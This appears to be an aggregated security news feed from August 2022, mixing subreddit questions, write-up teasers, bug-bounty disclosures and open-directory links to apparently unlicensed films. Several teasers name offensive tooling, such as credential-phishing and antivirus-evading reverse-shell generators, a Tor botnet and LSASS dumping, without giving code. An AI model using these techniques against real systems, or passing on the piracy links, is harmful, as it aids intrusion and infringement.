    Redline Stealer Malware Static Analysis
    Confidential — TryHackMe Walkthrough
    Hackers use String of Emojis to hack you.
    BrainStrom TryHackme
    Linux fundamentals — Summary:

    Disney Movies (+ a couple Alien Movies)
    http://173.249.48.243/movies2/ submitted by /u/NELS8672
    Directory with movies and series from 1931 - 2020
    https://dl3.3rver.org/cdn2/04/ EDIT: It has subtitles too in the HEX directories. https://dl3.3rver.org/ submitted by /u/Wrangler-Left
    a smattering of NSFW content with some anime thrown in?
    http://195.154.165.20/TDownloads/?C=M;O=D I checked if this was a duplicate and nothing came up - feel free to delete if it is (still kinda new to finding them on my own) submitted by /u/LucasImages
    faster?
    http://data.lrisp.net/disk6/English%20Movies/2022/ submitted by /u/Hyp3rionX
    MIDIs
    https://sprott.physics.wisc.edu/midi/ http://eddiejackson.net/piano/midi/ https://bhs.minor9.com/midi/ https://www.apprendrelaguitare.ca/midi-interpretes/ http://cd.textfiles.com/midifiles/ submitted by /u/ilikemacsalot
    Nice little collection
    browse around https://files.beast.ruun.network/Movies/ submitted by /u/Hyp3rionX
    Couple movies in french
    http://www.lemaurecourtois.com/film/ submitted by /u/Hyp3rionX

    SecWiki News 2022-08-21 Review
    No news updated today~ For more of the latest articles, visit SecWiki

    Replicant: Reproducing a Fault Injection Attack on the Trezor One
    submitted by /u/wrongbaud
    Backdoor specially made for hardened networks which leverages NTP
    submitted by /u/Idov31
    FreeBSD 11.0-13.0 LPE via aio_aqueue Kernel Refcount Bug
    submitted by /u/rwgd406

    Blind SSRF External Interaction on https://mtngbissau.com/
    MTN Group disclosed a bug submitted by error201: https://hackerone.com/reports/1220688


    CredPhish — Captures Usernames and Passwords
    CredPhish captures usernames and passwords and uses mechanisms intended to bypass antivirus protection layers. Continue reading on 100security »
    Chimera — Reverse Shell
    Chimera is a tool written in shell script that generates payloads capable of bypassing Windows Defender and other… Continue reading on 100security »
    Hackthebox[timelapse]
    Running an Nmap stealth scan against top 1000 ports returns several ports open including 53, 88, 135, 139, 389, 445, 464, 593, and 636: Continue reading on Medium »

    Always finish with a sweet Bug
    Hello friends, today I will tell you how I was able to find a critical vulnerability during an internal assessment. Continue reading on Medium »
    Failed Coding Assessment to Remote Code Execution - Part 1
    Security is mostly a superstition. It does not exist in nature. Continue reading on Medium »
    How I hacked my first Twitter web challenge
    It was Saturday morning when I checked Twitter on my phone and saw the following tweet… Continue reading on Medium »
    Cybersecurity Attack and Defense Strategies eBook
    Cybersecurity — Attack and Defense Strategies, Third Edition: Improve your security posture to mitigate risks and prevent attackers from… Continue reading on Medium »
    Cross site request forgery (CSRF) attack
    What is CSRF Continue reading on System Weakness »
    IW Weekly #18: $45,000 Facebook Bug Bounty, Cross-site Scripting, Hacking, Recon and Breaking into…
    Hey 👋 Continue reading on Medium »
    How to get started with bug bounty programs: tips for businesses of all sizes
    Introduction Continue reading on Medium »
    Automate Bug Bounty: Guide to Nuclei Tool
    What’s up awesome people, do you want to automate the whole bug hunting process? Continue reading on Medium »

    UK Security Clearance (SC) for dual citizen . Got some questions
    I am a dual UK/Canadian citizen with full British passport since birth. I’ve lived in the UK for 3 years and 3 months. Will I be eligible? submitted by /u/Informal-Pear-5272
    burp scanner pro
    burp scanner (pro) Hey guys. I'm a new appsec engineer and am wondering if any other appsec engineers or pen testers can shed some light on this part of the tool. Do you actually use the passive and active scanners for crawl and audit? If so, what scan parameters normally yield the best results? I generally conduct security assessments manually but I'm sure there are things I miss because I can't catch everything with my eyes. Also, being an appsec engineer means it's super hard to be the expert in security and devops and software best practices etc. Cheers submitted by /u/hootus_nootus

    How to cover the identity of an unknown Email Address: OSINT
    When encountering an unknown Email address it may seem like a daunting task to reveal the identity/owner of said email but in reality it… Continue reading on Medium »
    The “hidden” side of WordPress websites
    Some time ago there was a pretty popular song, but for this publication I will change its title a bit… “What does the WordPress say” Continue reading on Medium »

    CVE-2022-38392 Rhythm Nation Exploit
    Article URL: https://exploit.report/cve/cve-2022-38392/ Comments URL: https://news.ycombinator.com/item?id=32534626 Points: 3 # Comments: 0

    Since Rust eliminates the dangers of C/C++, will there be no more attacks of memory corruption and binary exploitation ?
    I wanted to devote myself to this side of cybersecurity but with Rust there shouldn't be more people dealing with this, right? submitted by /u/Remarkable-Emu-6453

    IW Weekly #18: $45,000 Facebook Bug Bounty, Cross-site Scripting, Hacking, Recon and Breaking into…

    SecWiki News 2022-08-20 Review
    No news updated today~ For more of the latest articles, visit SecWiki

    Ways to Dump LSASS
    Multiple different ways to dump hashes from LSASS https://crypt0ace.github.io/posts/Dumping-Lsass/ submitted by /u/Potential_Waltz7400

    1000+ Alive Proxy Servers Ranked, Maintained via automation (API available)
    Proxy List: https://oproxy.ml/ How to use a proxy: https://youtu.be/7sGhrGsd_HU Residential proxies are marked as private. submitted by /u/MidhunVNadh
    2021 and 22 movies
    http://213.58.179.90/media/store/ submitted by /u/RainyAbrar

    RPC call crashes node
    Monero disclosed a bug submitted by xfang: https://hackerone.com/reports/1379707

    Compare with a base image
    Is there a way to compare an image with a golden/base one with Axiom or Autopsy? I tried google but didn't find anything. Thanks! submitted by /u/DeadBirdRugby


    What is the safest way to research on sites with potential threats?
    After fixing the backup solution for our office I had some thoughts about the safest way to surf and download on the internet with minimal effort. I came to the following options and wanted to ask if Option E is really the best of the ones listed and if there is an even safer way?

    Option A: Surf normally. Shortcomings: Fully exposed, Virus threat

    Option B: Surf with SSL Connection. Shortcomings: Site visits still visible, IP tracking through ISP, Virus vulnerability

    Option C: Surf with SSL Connection + VPN installed on PC. Shortcomings: VPN disconnects could still leak IP, Virus vulnerability

    Option D: SSL + VPN + Surf on Sites with potential threats only within VirtualBox. Shortcomings: still possible IP leaks

    Option E: Have a second router which runs a VPN - have that router connected to a special laptop only for that router (not connected to company server/NAS) - Laptop has a second VPN running, risky sites still in virtualbox. Shortcomings: ? submitted by /u/Feltos
    How do we feel about redact.dev?
    https://redact.dev/ submitted by /u/Shelter4277
    Weird email from Apple but seems legit.
    Hello, I'm not sure if this is the right subreddit to post this question but here it is, sorry for the long post. Preface: My current phone is a Galaxy A52 that last year replaced an old iPhone 6s that since then is sitting in its original box on a shelf in my office. Also the Apple ID used on that phone was different, and before retiring it I logged off from Apple ID, iMessage etc., shut the phone off and forgot about it. Last night I received a notification email from Apple saying that my Apple ID was used to sign in to iMessage on an iPhone 6s. The email seems legit and not a phishing attempt, the sender email "noreply@email.apple.com" is a legit Apple Domain. Also the Apple ID URL linked in the email as well as the links in the email footer ar…
    SAST opinions
    What SAST options do yall recommend? Primary languages C#/Ruby integrating with github, visual studio. Mend looks nice but a bit expensive. I've heard fortify and veracode were meh but potentially cheaper. submitted by /u/AnyProgressIsGood
    What is the best open source honeypot? [Need Experiences]
    Hi All, Hope you are fine. I am creating a home lab and planning to set up several honeypots in several countries, but first I will install it in my VM and if I achieve that I will set up that honeypot on other servers. P.S.: I am looking for an All-in-One honeypot. Not just SSH or Credential Honeypot. I need your experiences and help about this issue. Any help would be appreciated. Thanks in advance. submitted by /u/110615
    TPM (Trusted Platform Module) vs. TEE (Trusted Execution Environment) - can credentials be *stored* on both?
    Hi guys, TPM is physically isolated from the rest of the system (i.e. it is a standalone chip on the mainboard), while TEE is a secure area of the main CPU. The key function of both TPM and TEE is to do cryptographic calculations, but can they also store credentials/keys used in these calculations? I know SE (Secure Element - also a standalone chip) is used exactly for storage purposes, but only 30% of modern smartphones have SE integrated (and mostly expensive models). So how is the credential storage task solved in TPM/TEE scenarios? Thank you! submitted by /u/LSDwarf
    gdpr compliant vpn / proxy / relay detection
    Hi I'm looking for a detection service like vpnapi.io or ipqualityscore.com which is located in the GDPR region. The two mentioned services are great but I simply don't know where they are located. And they don't mention any GDPR policies. Root cause: IP addresses are PII in GDPR and as such should not be sent to the USA and other countries considered as non-compliant... Appreciate any help, thanks! submitted by /u/winschdi

    Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
    Recent exploits observed in the wild are highlighted based on the availability of proofs of concept, the severity of the vulnerabilities the exploits are based on and the ease of exploitation. The post Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More appeared first on Unit 42.

    Russian Government Control and Propaganda in the age of Social Media: “Life.ru”
    VK is a gargantuan social media platform, largely overlooked by the western world. According to this statistic by Statista, it was the… Continue reading on Medium »
    Ethereum (ETH) OSINT investigations tools
    Ethereum (ETH) is the second most popular cryptocurrency in the world, as well as a platform for creating decentralized online services… Continue reading on Medium »
    Bitcoin (BTC) OSINT investigations tools
    Bitcoin (BTC) is a peer-to-peer payment system that uses the unit of the same name to record transactions. It is the world’s first… Continue reading on Medium »

    The 160 Hours Bug Bounty Hunting Challenge — Bug Hacking
    Bug bounty is one of the hot topics nowadays. If you are actively following cybersecurity people on social networks (especially Twitter)… Continue reading on Medium »
    How I hacked my University Servers
    Fri Aug 5 around 1:00 a.m. I was surfing the internet and like every other day I logged on my uni portal to check my attendance and if any… Continue reading on Medium »
    My own methodology to find XSS vulnerability
    Before everything I have to say this article and this methodology is my own methodology and people do not necessarily follow this way… Continue reading on Medium »
    Account takeover worth $1000
    How I was able to find account takeover bug in one of the biggest organization in the world Continue reading on Medium »
    My Bug Bounty Resources
    author : — SATYAMP Continue reading on Medium »
    New Bug Bounty Vault on Hats: Welcome Mover!
    With great excitement we welcome another project to Hats Finance. Through our decentralized bug bounty platform, we onboard Mover to… Continue reading on Medium »
    Bypassing CSP
    CSP stands for Content Security Policy. This is a response header that identifies what is authorised to load scripts, HTML elements and… Continue reading on Medium »
    Introduction to the MITRE ATT&CK Framework
    What is the MITRE ATT&CK Framework? Continue reading on Medium »

    Walkthrough: Shared — HackTheBox
    In this article, I will tell you about my walkthrough of the Shared challenge from HackTheBox. Cause this is my first time making a walkthrough… Continue reading on Medium »

    Bighuge BLS OSINT Tool - BBOT
    submitted by /u/aconite33
    GraphQL Security Testing Without a Schema
    submitted by /u/alxjsn
    Pitraix Botnet - Modern P2P Self-Modifying Botnet Cross-Platform Over TOR
    submitted by /u/United-General-2000
    iOS Privacy: TikTok monitoring all keyboard inputs and taps
    submitted by /u/CyberMasterV
    A Lightweight Approach To Implement Secure Software Development LifeCycle (Secure SDLC)
    submitted by /u/sanitybit
    Zero Day Initiative — But You Told Me You Were Safe: Attacking the Mozilla Firefox Renderer (Part 1)
    submitted by /u/sanitybit
    Oh SSH-it, what's my fingerprint? A Large-Scale Analysis of SSH Host Key Fingerprint Verification Records in the DNS
    submitted by /u/sanitybit

    Write-up: Git Happens @ TryHackMe
    Erlik — Vulnerable SOAP Service
    C Language for Hackers & Beyond! 0x02

    Looking for a solution for Enterprise Mobile forensics
    Our need is to be able to remotely and stealthily pull a file list and directory structure from Enterprise managed mobile devices, specifically the download folder and other folders used by chat apps for downloads. To be able to remotely and stealthily collect specific files would be a bonus. Anyone aware of such a solution in the market? submitted by /u/vacathrowaway789
    Best Practice to avoid bitlocker.
    This is kind of a general question, but for imaging, what is the best way to avoid bitlocker when pulling out a hard drive or SSD? Is it smarter to remove the battery and then pull the drive? I have read that pulling the battery can potentially mess with the BIOS settings, which will trip bitlocker. Or is it smarter to leave the battery plugged in and then pull the drive? Does this change with SSD? I don't want to avoid bitlocker but then kill the drive. I know I could log in and then pull the bitlocker key, but that overwrites artifacts, and then I would need the custodian credentials and then admin credentials, which we sometimes don't get; prefer to do a dead image. Any help would be appreciated. Thank you. submitted by /u/dougman2082
    Junior advice
    Hi everyone, I am a junior IT with a systems background and a bit of VAPT. In the company I was asked which field of interest I wanted to develop my knowledge in and I put Digital Forensics. At the moment there is no one who takes care of this thing, being a small company, but it is not a problem for me; it would still be a side activity to my normal job that I want to explore. The company did not give me a budget on tools and courses but asked me to evaluate what I would need and then we will evaluate together, but they have already told me that there are no economic difficulties.

    In the wiki I read something, but I would like to ask you in practice which courses I should start with and which enterprise tools to use, because I have already fiddled with dd, autopsy, ftk, EZTools, adb, volatility and the other hundreds of tools, but having the opportunity to spend I imagine there are also more complete solutions, especially as regards the acquisition (server, client, mobile), because trying to explore by myself I understood how many things work, but the analysis is sometimes slowed down by the amount of data and the more delicate acquisition if real evidence were to be collected for a case. I've seen Cellebrite UFED, Belkasoft X Forensics, and Oxygen Forensics Detective, which seem the most professional to me, but which one to choose? Are there any other proposals?

    For the courses issue, I will start reading some wiki books, but for courses or certifications I am completely lost; I accept any suggestion.

    Thanks everyone in advance! submitted by /u/ddUnicorn
  • Open

    SecWiki News 2022-08-19 Review
    Recommended quality resources for Digital Forensics and Incident Response (DFIR) by ourren; Israel's national cyber defence system: construction and lessons by ourren; On elegantly injecting a Java Agent memory shell by ourren; A detailed discussion of the new enterprise risk assessment model by ourren; Tailmon-EDR: an open-source host security guard by ourren. For more articles, visit SecWiki.
  • Open

    Good reporting tool for team to use that is compatible with nessus?
    Currently we use Dradis and it works... but it could be a whole lot better. We are trying a lot of demos at the moment. We've tried attack forge and a couple others. Does anyone have any recommendations? submitted by /u/Ziggy__Pop [link] [comments]
  • Open

    Song from 1989 declared a cybersecurity vulnerability for crashing hard drives
    Article URL: https://www.techspot.com/news/95671-janet-jackson-song-1989-declared-cybersecurity-vulnerability-crashing.html Comments URL: https://news.ycombinator.com/item?id=32521408 Points: 3 # Comments: 0
  • Open

    Five bad coding habits: how many do you have?
    By raising awareness of bad coding habits, enterprises can begin to proactively attend to code integrity.
    Beware of data leaks! "即刻PDF阅读器" (Jike PDF Reader) ships with a built-in backdoor that collects users' private data
    Recently, the Huorong security team discovered that "即刻PDF阅读器" (Jike PDF Reader) contains a built-in backdoor program which, without the user's knowledge, indiscriminately collects all kinds of private data, such as search content on Google, Baidu, Taobao, JD.com and Tmall, e-commerce purchase records, system process information, and more.
    Exposing the APT group MurenShark (穆伦鲨), which targets Turkish submarine researchers
    After analysis, researchers confirmed that this round of attack activity comes from a new threat entity, Actor210426, identified by Fuying Lab (伏影实验室) in April 2021.
    FreeBuf Weekly | Gartner releases the 2022 Hype Cycle for Emerging Technologies; two Redmi phones have security vulnerabilities; Instagram tracks users' web activity
    In this week's FreeBuf Weekly we summarise and recommend the week's hot news, security incidents, good reads and handy tools, so you don't miss a single highlight!
    Why traditional CAPTCHAs are no longer secure
    Character-based CAPTCHAs, invented more than 20 years ago, cannot keep pace with the times and are bound to run into serious difficulties; their security speaks for itself.
    "Yanluowang" ransomware strikes again! How Cisco was compromised is disclosed
    In this incident, the Yanluowang ransomware gang hijacked an employee's personal Google account, which contained credentials synced from their Chrome browser, and then used the employee's credentials to get into the Cisco network.
  • Open

    On elegantly injecting a Java Agent memory shell
    Author: rebeyond. Original link: https://mp.weixin.qq.com/s/xxaOsJdRE5OoRkMLkIj3Lg Review: In 2018, the article "Using 'process injection' to achieve fileless revival of WebShells" first proposed the concept of memShell (memory shell), using Java Agent technology to implant a webshell into JVM memory, and released the memShell project on GitHub. The implantation process in that project is rather cumbersome and requires...
  • Open

    Stored XSS on TikTok Ads
    TikTok disclosed a bug submitted by sinayeganeh: https://hackerone.com/reports/1504202 - Bounty: $2500

  • Open

    Malware analysis (basic level) and useful tools
    Since we need a piece of malware in order to analyse it, we create a simple ELF executable with msfvenom: Continue reading on Medium »
  • Open

    rocket science papers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    medieval and renaissance art
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    a russian OD (not a bad one).
    This is the URL -> http://109.200.155.175/%D0%A4%D0%B8%D0%BB%D1%8C%D0%BC%D1%8B/ It is NOT obfuscated; it's just that all directory names are in Cyrillic, and the browser translates them to percent codes. As for the content, it's a kind of mixed bag. I'd say it's 50/50 good quality stuff (high bit-rate) and SD stuff. The first difficulty is that all folder names are in Russian, and for some reason Google Translate didn't want to touch it (dunno why?). Another one is that all the movies are muxed, and the default audio track is in Russian, hence it's all to be remuxed again. Fortunately I found only 3 (I think) titles that were without the original audio track, so it's good to get. I'm talking MKV files obviously... AVIs I didn't touch; not interested in SD stuff :P There is also some music there (this is how I found it). Happy leeching :D submitted by /u/paprok [link] [comments]
  • Open

    Process of solving a Quiztime #SundayQuiz challenge
    Solving Quiztime challenges is always fun as this is an event which kills a lot of time, which is suitable for me as I am very free in the… Continue reading on Medium »
    What is the Potential Impact of too Much Personal Identifiable Information?
    The wealth of Personal Identifiable Information (PII) which can be gathered on an individual from the internet is growing exponentially… Continue reading on Medium »
  • Open

    Delimiter injection in GitHub Actions core.exportVariable
    GitHub disclosed a bug submitted by jupenur: https://hackerone.com/reports/1625652 - Bounty: $4617
  • Open

    The 10th Anniversary Edition - Cobalt Strike Research and Development
    submitted by /u/billymeter [link] [comments]
    Hardware-based threat defense against increasingly complex cryptojackers
    submitted by /u/SCI_Rusher [link] [comments]
    Guide to DLL SideLoading
    Hey! Here's a small blog I wrote that shows how we can use DLL Sideloading. Let me know what you guys think. https://crypt0ace.github.io/posts/DLL-Sideloading/ submitted by /u/Potential_Waltz7400 [link] [comments]
  • Open

    Multiple Vulnerabilities Discovered in RPA Vendor Blue Prism.
    submitted by /u/jat0369 [link] [comments]
  • Open

    Box Drive Forensics
    Hi. I work with a lot of companies that use Box Drive for online file storage. I use KAPE to collect Box Metadata files from the users computer so I have a lot of files to analyze in order to figure out what was happening. What tools are everyone using for Box Drive forensics? submitted by /u/antmar9041 [link] [comments]
  • Open

    Vulnerability in open source identity management system Free IPA could lead to
    Article URL: https://portswigger.net/daily-swig/vulnerability-in-open-source-identity-management-system-free-ipa-could-lead-to-xxe-attacks Comments URL: https://news.ycombinator.com/item?id=32511814 Points: 2 # Comments: 0
    Janet Jackson music video declared a cybersecurity vulnerability
    Article URL: https://www.theregister.com/2022/08/18/janet_jackson_video_crashes_laptops/ Comments URL: https://news.ycombinator.com/item?id=32506400 Points: 16 # Comments: 1
  • Open

    SecWiki News 2022-08-18 Review
    Advanced threat discovery based on massive sample data by ourren; Three key capabilities for critical information infrastructure security protection by ourren; Financial industry security operations capability maturity model (FCSO-CMM) by ourren; How Hash-Based Safe Browsing Works in Google Chrome by ourren; An evolving big-security framework by ourren. For more articles, visit SecWiki.
  • Open

    CVE-2022-38392 Details
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-38392 Comments URL: https://news.ycombinator.com/item?id=32508488 Points: 1 # Comments: 0
  • Open

    What to Log V2.0
    I asked this question yesterday but people suggested more info was necessary. That's a fair call, so I'm making a V2.0 of my question. This is for my side hustle on a domestic internet connection. My computers are an Apple, a dual-booting (Windows 10/Linux) PC and a really old PC running XP. Apart from these, I have 2 other computers which are for personal use only, i.e. internet browsing and e-mail. Other than that, there are tablets and phones. The XP machine isn't connected to the network, but I wouldn't mind having it running on the network for file transfers between my main PC and that XP box. No idea whether this is a good idea or not given how old XP is. Everything is behind an ISP's router. Nothing will be accessible from outside my network. However, everything has internet access except for the XP machine, which is currently sitting unplugged as I mentioned previously. I plan on running a server on the Apple and a different one on Linux. I will be accessing the Apple server from two computers, i.e. from the Apple and the dual-boot PC, i.e. from Linux and Windows 10. The Linux server will only be accessed from within Linux. I don't see a need to connect to it from anywhere other than from within Linux, at least at this stage. So I would like to ensure nothing can hurt me from outside my network, and if something stupid happens on my network, whether coming from my personal machines or my workstations, I would like to be able to do something about it, i.e. identify and then remediate. The main point is to keep my data safe on my servers. At the moment, I'm setting up the PF firewall on the Apple device. But I want to set up a firewall on the Linux machine at some stage also. I will be logging everything to my HDDs on my Apple device and on the Linux install. I plan on reviewing the logs every so often to ensure everything is running hunky dory. So the question is, what stuff should I be logging? submitted by /u/Jastibute [link] [comments]
    Secure and Private ipaddress check tool?
    Any suggestions? I use analti on my streaming devices. Is that a trustworthy company for things other than streaming? submitted by /u/Shelter4277 [link] [comments]
    Should I use CAA Records?
    Hi AskNetSec, I'm a DevSecComplianceInfrastructureM365AWSCICDEngineer, I've recently found out about CAA records in DNS and I wanted to ask if I should use them? Would this prevent another CA issuing certificates against my domain, and should I be worried about this? submitted by /u/CyberStagist [link] [comments]
  • Open

    Building a SOC with Splunk: a ramble on SOC construction and Splunk's role
    Splunk is so expensive; what is its role, how does it connect to security and the SOC, and how should it be used?
    FreeBuf Morning Report | Identity fraud cases hit a new record in 2021; BMW gets poached while hackers rake in money out in the open
    Microsoft employees have exposed sensitive login credentials for the company's online infrastructure.
    The BlackByte gang returns with new extortion tactics
    The BlackByte ransomware is back with version 2.0 and has set up a new data-leak site.
    A chat about the changes in the new risk assessment standard
    The new risk assessment simplifies the relationships between elements, retaining only assets, vulnerabilities, threats, security measures and risk.
    Kage: a graphical user interface for Metasploit Meterpreter
    Kage helps researchers interact with Meterpreter sessions and generate payloads through a graphical UI.
    How to enumerate Active Directory domains with SilentHound
    SilentHound is an Active Directory domain security assessment tool that resolves user, administrator and group information via LDAP and uses it to quietly enumerate the domain in the background.
    Attackers develop BugDrop malware that can bypass Android security protections
    As BugDrop gradually irons out its current flaws, attackers gain a powerful new weapon in their fight against security teams and banks, one that can defeat the defences Google currently employs.
    How to break the "hard problem" of data security | FreeBuf enterprise group topic discussion
    Driven from above by regulatory constraints and from below by the need to safeguard business operations, how should data security operations be done well?
    PR-DNSd: a powerful passive recursive DNS daemon
    PR-DNSd is a powerful passive recursive DNS daemon with many applicable scenarios.
    Recruitment notice from the Credit Card Centre of Shanghai Pudong Development Bank
    Established in January 2004, the Credit Card Centre of Shanghai Pudong Development Bank is one of the first credit card centres in China to obtain a financial licence.
    How to use truffleHog to find sensitive data and protect the security of your codebase
    The tool searches for potentially sensitive information by analysing in depth the commit history and branches of a target Git repository.
    Identity fraud cases hit a new record in 2021
    Google Voice scams set a new record among identity-related fraud cases in 2021.
    LAUREL: a powerful Linux event log auditing and transformation tool
    It helps researchers process Linux system event logs and post-process them so that the logs can be fed into other modern security monitoring systems.
  • Open

    IW Weekly #17: $30,000 Bounty, Instagram Account Takeover, AWS Security Series, Google…
    Hey 👋 Continue reading on InfoSec Write-ups »
    Cybercriminals Developing this to Bypass Android Security Features
    In a sign that malicious actors continue to find ways to work around Google Play Store security protections, researchers have spotted a… Continue reading on Medium »
    N/a to $750 bounty for a Blind XSS.
    Without wasting any time, I try to keep everything to the point. Continue reading on Medium »

  • Open

    Livestream video for Developing POC for CVE-2022-26923
    Thanks to the participants, it was really fun even though a lot of mistakes were made haha. Full, uncut video is uploaded to my YouTube: https://youtu.be/z86tfhMU_vU submitted by /u/lsecqt [link] [comments]
  • Open

    How to create a bootable encrypted CD/DVD/USB?
    I have a custom Win10 image that was made in MDT. I need to figure out a way to encrypt the image while still having a bootable disc. The idea is that you insert the disc into the drive, boot the computer from the disc, are prompted for a password, and if the password is correct, the image on the disc is decrypted and installed. If anyone has any experience with this, I'd appreciate hearing your ideas. submitted by /u/blixel [link] [comments]
    Instagram set on private mode without following anyone but people instantly know what posts I like and comment on?
    Have always wondered how people do this? I've got an insta account that I use to follow and like certain content (not for following people I know irl) but somehow people who I know irl find out my activity on that account instantly? Eg if I like a certain post and comment on it, yet they don't follow me? Maybe there's something I'm missing... Any help is much appreciated. submitted by /u/sdman57 [link] [comments]
    Monitor usb
    Hello, I am looking for software that monitors a USB. Right now I am looking at USB Monitor Pro, but I am more interested in free alternatives. submitted by /u/ZFosint [link] [comments]
    What to Log
    Hi, I’m configuring a PF firewall. What packets should I log? submitted by /u/Jastibute [link] [comments]
    The Suricata is recording a lot of data and not enough space
    Hi there. Do you know any best practices for how I can reduce the log size? Suricata produces 150GB of JSON logs per day. Well, I can't handle that in the long run. Is there a possibility to switch from JSON to another type of log? Or maybe there are some not very informative rules that can be disabled? submitted by /u/athanielx [link] [comments]
    Intro book to IT & Security
    Hi there. I will give a class on cybersecurity to non engineers. Very likely they don't have any tech background. I need to recommend books/lectures that serve as an intro to IT, cloud, and maybe basic security concepts. Any recommendations? submitted by /u/Equivalent-Net-7496 [link] [comments]
  • Open

    Is everything about stack and heap overflows?
    submitted by /u/_RichardHendricks_ [link] [comments]
    How you find vulnerable version and patched version for bin diff?
    I work on a CVE, and I need the vulnerable DLL and the patched DLL. For this I need to download the vulnerable Windows and then update it to get the patched version, or another solution for this problem. submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Introduction to web APIs
    This is post from my new blog in which I will be sharing notes about things I am learning. It will be centered around security/application… Continue reading on Medium »
    Welcome to Hats, Jelly Protocol
    We are happy to announce our bug bounty partnership with Jelly protocol! Continue reading on Medium »
    Step 19: SQLi (a la PortSwigger)
    Keep it short and sweet (as much as possible today anyway)… I’m gonna use some other stuff beyond just HTB: Academy. Been doing some… Continue reading on Medium »
    Neom, Attack Surface and Ransomware
    Neom is certainly setting out to wow the world with bold ideas and we have to wonder if some of the aspirations are achievable within the… Continue reading on Medium »
    Hats Bug Bounty Launches
    We’re excited to announce we’ve partnered with Hats Finance for our Bug Bounty. You can find the Jelly Vault on… Continue reading on Jelly »
    Archethic Bug Bounty Program
    Archethic blockchain is launching a bug bounty program; find all the conditions to hunt for bugs and get rewarded up to $10k. Continue reading on Archethic »
    New bug bounty alert: welcome Solace Finance!
    After an exciting partnership announcement, we welcome Solace Finance as the new bug bounty vault… Continue reading on Medium »
  • Open

    How I Caught A Hacker
    Hello, respectful readers. One of my friends had an Udemy account and shared the account’s credential with some friends. But, one day my… Continue reading on Medium »
    BirdHunt. Search for tweets by location
    Continue reading on Medium »
    Exposing a Pretender using SocMed OSINT
    SocMed = Social Media OSINT = Open Source Intelligence Continue reading on Medium »
  • Open

    Introduction to Cyber Security
    As I said before, I am starting to write on cyber security issues, these articles will be as far from technical information as possible… Continue reading on Medium »
  • Open

    Searching for files in public MEGAs / Google Drives
    Are there any ways to search for a filename across all publicly available MEGAs or google drive folders? Any help would be much appreciated submitted by /u/adzboy9 [link] [comments]
    Lots of stuff in here music sorted by artist, videos, programs etc
    http://65.186.78.52/ submitted by /u/Akhenaten1049 [link] [comments]
  • Open

    A Deep Dive Into Black Basta Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Threat Hunting Hypothesis: Creating Multiple Types of Hypotheses With Examples
    submitted by /u/Successful_Mix_8988 [link] [comments]
  • Open

    Several powerful primitives for exploiting the macOS kernel may never get fixed
    submitted by /u/gaasedelen [link] [comments]
    Spammers use Google Translate to bypass Domain-Blacklists
    submitted by /u/ma-ni [link] [comments]
    Return to Sender - Detecting Kernel Exploits with eBPF
    submitted by /u/thorn42 [link] [comments]
    Wheel of Fortune Outcome Prediction – Taking the Luck out of Gambling
    submitted by /u/digicat [link] [comments]
  • Open

    Let's Dance in the Cache - Destabilizing Hash Table on Microsoft IIS!
    No content preview
  • Open

    SecWiki News 2022-08-17 Review
    Research and writing English academic papers by ourren. For more articles, visit SecWiki.
  • Open

    Using Kubernetes Plugins for Better Security
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, retrieving multiple values in a…
    No content preview
  • Open

    Cross Site Scripting Vulnerability in fabric-sdk-py source code
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1670187
  • Open

    Zhang Hongyang of Yunchang Games: on the road of security, keep your feet on the ground and your eyes on the sky | TTSP security think tank expert interview
    FreeBuf had the privilege of interviewing Zhang Hongyang about the stories of his journey in security, hoping to offer inspiration and food for thought to newcomers to the security industry.
    FreeBuf Morning Report | Kaspersky Lab develops an anti-hacking phone; Microsoft rolls out tamper protection for Mac
    According to Sputnik, the president of Kaspersky Lab recently said the lab is developing anti-hacking features for a phone under its own brand.
    [Hiring] Security R&D and research roles (experienced hires) | based in Shenzhen, Shanghai or Beijing
    Tencent Security Keen Lab is recruiting security personnel.
    "Network Security Standards Practice Guide: Health Code Anti-Counterfeiting Technical Guide (draft for comment)" released
    Based on relevant policy and regulatory requirements, the Guide supports epidemic prevention and control work, guards against the security risk of forged health codes, and provides a technical practice reference for health code anti-counterfeiting.
    A new attack technique emerges that can weaponise PLCs
    The ingenuity of the technique lies in weaponising programmable logic controllers (PLCs) to gain an initial foothold on engineering workstations and subsequently compromise operational technology (OT) networks.
    Hybrid phishing attacks surge 625% in Q2
    Hybrid phishing threats are multi-stage attacks, unlike traditional phishing.
    Critical vulnerability disclosed in Realtek, affecting many network devices
    The CVE-2022-27255 vulnerability affects millions of network devices that use Realtek RTL819x system-on-chips (SoCs).
    CS:GO trading site hacked, $6 million worth of skins stolen
    CS.MONEY, one of the largest skin trading platforms for the popular shooter CS:GO, had 20,000 in-game skins worth a total of about $6 million stolen in a hack.
    FreeBuf consulting services | Enterprise security awareness education keeps "Cybersecurity Week" online year-round
    Cybersecurity has become an indispensable part of work and study.
  • Open

    AdobeReader logic vulnerability write-up (CVE-2021-21037)
    Author: Wang Zhiyuan, 360 Vulnerability Research Institute. Original link: https://vul.360.net/archives/503 Background: We successfully completed the AdobeReader RCE target at the third "Tianfu Cup" international cybersecurity contest; this article describes in detail the two logic vulnerabilities used there: a DLL loading vulnerability that had existed for 15 years and a random number conversion logic vulnerability, assigned CVE-2021-21037. DLL loading logic vulnerability analysis: While hunting AdobeReade...

  • Open

    Want to learn cyber security
    Greetings. I'm wondering if it's possible to get into the cyber security field without a degree. I'm in my early 40's and I hate my blue collar career. I've always loved IT stuff and have been very good at it. I just never focused on my school studies in the past (due to a late diagnosis of ADHD). I did take some courses way back when I was laid off, such as A+ and Network+, which I taught myself and had certifications for (now long expired). I know I could do well with this, but I'm wondering, since I'm older, whether it might be too late to follow this dream. I can't go to school full time since I work full time. Something along the lines of ethical hacking sounds interesting to me. Is it possible to learn on my own and get into a cyber security career? Where should I start and what certifications would I need? Any tips or advice from anyone that's been in a similar situation? I'm in Canada if country makes a difference. Thanks! submitted by /u/Darth_Rayzor [link] [comments]
    Can I be infected by copying a bad file?
